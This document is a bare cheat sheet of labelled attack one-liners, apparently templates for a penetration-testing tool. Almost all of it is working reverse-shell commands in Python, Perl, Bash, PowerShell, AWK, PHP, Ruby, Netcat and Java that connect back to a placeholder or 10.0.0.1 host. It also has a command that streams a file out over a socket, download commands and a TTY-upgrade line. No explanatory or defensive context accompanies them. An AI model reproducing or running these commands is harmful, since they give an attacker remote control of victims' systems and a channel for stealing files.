"Reverse Shell Python"
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<LHOST>\",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"<PROMPT (shell type)>\",\"-i\"]);'

"Reverse Shell Perl"
perl -e 'use Socket;$i=\"<LHOST>\";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"<PROMPT (shell type)> -i\");};'

"Reverse Shell Bash"
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1

"Reverse Shell PSH"
$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

"Reverse Shell using AWK"
awk \'BEGIN{s="/inet/tcp/0/<LHOST>/<LPORT>";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}\'

"Reverse Shell using PHP"
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

"Reverse Shell using Ruby"
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

"Reverse Shell using Netcat"
nc -e /bin/sh 10.0.0.1 1234
### With a strange version of netcat, can do -> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

"Reverse Shell using Java"
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

"Send File via Socket Connection",
python -c \'exec """\nimport socket;import sys;s = socket.socket();s.connect(("<LHOST>",<LPORT>));f=open ("<PROMPT>", "rb");l = f.read(1024)\nwhile (l):\n    s.send(l)\n    l = f.read(1024)\ns.close();"""\'

"Download File via Python"
python -c \'import urllib;urllib.urlretrieve ("<PROMPT (URI)>","<PROMPT (local path to save to)>");\'

"Download File via SCP"
scp <USER>@<RHOST>:\'"<PROMPT>"\' .

"Obtain a TTY via Python"
python -c \'import pty;pty.spawn("/bin/bash")\'
